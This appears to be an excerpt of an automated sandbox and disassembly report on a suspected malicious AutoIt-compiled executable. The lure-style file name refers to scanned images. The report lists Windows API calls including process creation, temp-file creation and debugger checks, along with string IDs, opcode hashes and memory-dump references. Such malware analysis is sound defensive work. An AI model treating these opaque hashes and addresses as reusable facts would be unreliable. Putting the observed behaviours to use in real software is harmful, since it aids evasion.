                                                                                • __Init_thread_footer.LIBCMT ref: 0046A529
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Init_thread_footer_wcslen
                                                                                • String ID: ,%R$3yJ
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004B1DD3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00523018,0052305C), ref: 004E81BF
                                                                                • CloseHandle.KERNEL32 ref: 004E81D1
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: \0R
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: 3, 3, 16, 1
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004B0B23
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                APIs
                                                                                  • Part of subcall function 0046F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00470D71,?,?,?,0045100A), ref: 0046F7CE
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0045100A), ref: 00470D75
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0045100A), ref: 00470D84
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00470D7F
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0046E3D5
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: 0%R$8%R
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 004C302F
                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004C3044
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: %.3d$X64
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E236C
                                                                                • PostMessageW.USER32(00000000), ref: 004E2373
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E232C
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004E233F
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 086539ce94fedd3a70f98cb2a53cce9695973c840eea0c282314125459374f33
                                                                                • Instruction ID: 3d22147c3a388d6300c8463b1aae1e63fba9dd54ded6adf92df6c2c52a9c7130
                                                                                • Opcode Fuzzy Hash: 086539ce94fedd3a70f98cb2a53cce9695973c840eea0c282314125459374f33
                                                                                • Instruction Fuzzy Hash: 72D0A936380350BAE264A3319C8FFC66A04AB00B00F0009267205AA0D1C9A0A8028A18
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0048BE93
                                                                                • GetLastError.KERNEL32 ref: 0048BEA1
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0048BEFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: 03f72e62e8daa0af8ad40ed78671e00004084d7b2dfa36b5161312dce0e7ea4a
                                                                                • Instruction ID: 6bc79184ce2b0466bb176ad104b07fd7acbaf86b88d74cc85cdba2ab19560832
                                                                                • Opcode Fuzzy Hash: 03f72e62e8daa0af8ad40ed78671e00004084d7b2dfa36b5161312dce0e7ea4a
                                                                                • Instruction Fuzzy Hash: 8B41D835604206AFCF21AF65CC84ABF7BA5DF41310F14856AFB599B2A1DB348D01CB99